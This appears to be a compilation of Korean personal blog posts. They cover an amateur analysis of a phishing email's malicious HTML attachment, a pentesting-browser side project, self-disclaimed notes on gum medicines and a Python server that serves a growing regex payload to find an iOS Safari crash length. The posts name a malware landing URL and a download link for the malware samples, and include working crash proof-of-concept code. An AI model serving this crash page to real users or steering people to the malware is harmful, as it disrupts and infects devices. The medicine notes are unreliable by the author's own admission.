"End of Aug. Statement Reqiured" 이메일 분석

지멜에 보니 "End of Aug. Statement Reqiured" 이런 메일이 하나 날라와 있다 ㅋ

근데 첨부파일이 있네? 이런..ㅡ,.ㅡ 악성코드인가보다 하고 넘어가려했다가 ㅋ

간만에 하나 보까 하고 봤는데 ㅋㅋ 끝까지 보긴 귀찮고 어느정도만 보고 넘긴다 ㅋ


우선 아래와 같은 메일이 수신되었다 ㅋ

메일에 있는 첨부 파일을 다운로드 받아 보면 아래와 같이 되어있다. ㅋㅋ

요즘은 다 저래 해놔 ㅠㅠ 보기 힘들게 ㅠㅠ 방화벽 우회 하려고 별짓 다함 ㅋ

위 html 파일을 조금 수정해주면(주석처리된부분) 내용이 어떤지 대충 볼수 있다. ㅋ

아래는 주석 처리하고 xmp로 출력하게 한 부분

(실제 링크인 http://veneziolo.ru:8080/forum/links/column.php 를 볼수 있다.)

실제 링크를 접속해서 보면 징하게 많은 html 코드가 실행되는 것을 볼수 있다. 

(여기서부터는 G.G ㅋㅋㅋ 너무 많아 ㅋㅋ pdf 부터 jar, ocx까지 ㅋ)

html과 jar 파일들은 

http://oroi.org/121114_malware.zip 에서 받아 볼수 있습니다.

oroi browser(with pt)

모의해킹할때 필요한 기능들을 모아 놓은 브라우져가 있으면 좋겟다 싶어서 시작한 프로젝트

내가 쓸일이 있겟냐만은 그래도 만들기 시작하면 좋지 않을까 생각함

현재 구현중인 기능은 spider 기능(2012.11.07), proxy기능(2012.11.07) 이다.

paros 기능도 넣고 wget 기능도 넣는것 ㅋ

나머지는 현재 어느 정도 구현되어 있슴 ㅋ
(나중에 sql injection 기능 추가할 예정임, 이거때문에 한거라 ㅋ)


소스 : http://code.google.com/p/oroi/source/browse/#svn%2Ftrunk%2Foroibr
바이너리 : http://code.google.com/p/oroi/source/browse/trunk/oroibr/oroibr/bin/Release/oroibr.exe

개요

쿠키

히스토리

 proxy(구현중)

인사돌, 이가탄, 이튼큐에 대해 검색

요즘 이빨에 신경을 많이 썼더니 잇몸약에 관심이 있어 찾아봤떠니 이런 정보가 있다.

순수히 의학적 지식 전혀 없이 블로그 검색만으로 내린 판단이기에 전혀 근거없고 믿지마세요. 그냥 개인적으로 나중에 잊지 않으려고 쓰는거에요.

잇몸약으로 유명한게 인사돌과 이가탄, 이튼큐, 덴티큐? 이런게 있는거 같은데...

인사돌과 이튼큐는 옥수수 생약성분으로 이루어지고

이가탄은 항생역활을 도와주는 약품이 들어있다고 한다.

하지만 여기서 중요한건 이 모든 약들이 치료제가 아니라는거다.

단지 관리를 더 잘하기 위해 먹는 비타민제 같은 의미가 클뿐 치료 역활은 없다는 것이다.

여기서 이가탄은 항생 역활을 도와주는 직접적 역활을 통해 효과는 좋으나 빈속에 먹으면 쓰리다는것이 있고

인사돌과 이튼큐는 체네 콜레스테롤을 줄이고 면역력 증진에 효과가 있다고 알려진 성분이 포함되어 비타민제로 생각하면 될듯하다.

나중에 그냥 이상한 비타민제 사먹는것 보다 그냥 인사돌이나 이튼큐 사먹는게 더 나을거 같다는 생각을 한다.ㅋ

IOS Safari Crash Check

#IOS에서 SAFARI CRASH 취약점이 있는데 OS마다 다르다는 이야기가 있어서 ㅋ
#길이체크를 위해서 만들어 봤다 ㅋ 자동으로 refresh하는데 refresh할때마다 size올리는 ㅋ
#한번 접속하면 그다음부터는 멈출때까지 나두면 된다 ㅋ
#lv_buflen의 값을 조절하면서 자리수 단위로 하면 더 빨리 할수 있음 ㅋ
#참고로 지속하다보면 더미 메모리에 의해 크래쉬나는경우도 있는듯함 ㅋ
#발견하더라도 2~3단계 전(290000에서 크래쉬 발생시 270000에서 해보는 등)에서 한단위씩 낮춰서 할필요있음(100->10)
#IOS Safari Crash Check
import socket
import sys

HOST = '0.0.0.0'
PORT = 88
s = None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
if s is None:
    print 'could not open socket'
    sys.exit(1)
#lv_buflen=925000
lv_buflen=100000
while 1:
    conn, addr = s.accept()
    print 'Connected by', addr
    data = conn.recv(1024)
    if not data: break
    data='\n\n<html><title>Crash with match script('+str(lv_buflen)+')</title>'
    data+='<script>setTimeout("location.reload()", 20000); \n var lv_var=\'oroi\';\n lv_var.match(\''+('A'*lv_buflen)+'\');\n</script></html>\n\n\n\n'
    conn.sendall(data)
    print str(lv_buflen) + ' sended'
    conn.close()
    lv_buflen+=100